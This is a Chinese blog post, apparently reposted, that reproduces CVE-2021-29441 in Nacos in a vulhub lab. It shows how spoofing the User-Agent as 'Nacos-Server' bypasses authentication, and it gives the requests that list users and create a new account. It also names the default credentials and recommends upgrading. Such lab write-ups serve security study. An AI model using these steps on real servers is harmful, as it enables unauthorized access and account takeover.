nacos未授权访问漏洞复现
nacos未授权访问漏洞复现
一、漏洞介绍
Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。
该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。并且利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息。
影响版本: Nacos <= 2.0.0-ALPHA.1
漏洞编号:CVE-2021-29441
二、环境搭建
vulhuab搭建环境好后 访问http://ip:8848/nacos/#login
默认账户密码为:nacos/nacos
三、漏洞复现
1.查看账户
访问http://ip:8848/nacos/v1/auth/users?pageNo=1&pageSize=2并且修改user-agent为Nacos-Server
可以看到有nacos账户 密码为加盐后的密码。
2.创建账户
访问http://ip:8848/nacos/v1/auth/users?username=crow&password=crow
创建一个新账户名为crow 密码为crow
bp修改请求方式为post user-agent修改为Nacos-Server
成功创建新账户crow。
登陆crow验证一下 可以登陆。
四、修复建议
升级nacos到最新版本。
转载:https://blog.csdn.net/csdnmmd/article/details/125905371
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么 退出登录 或 修改密码 无法使 token 失效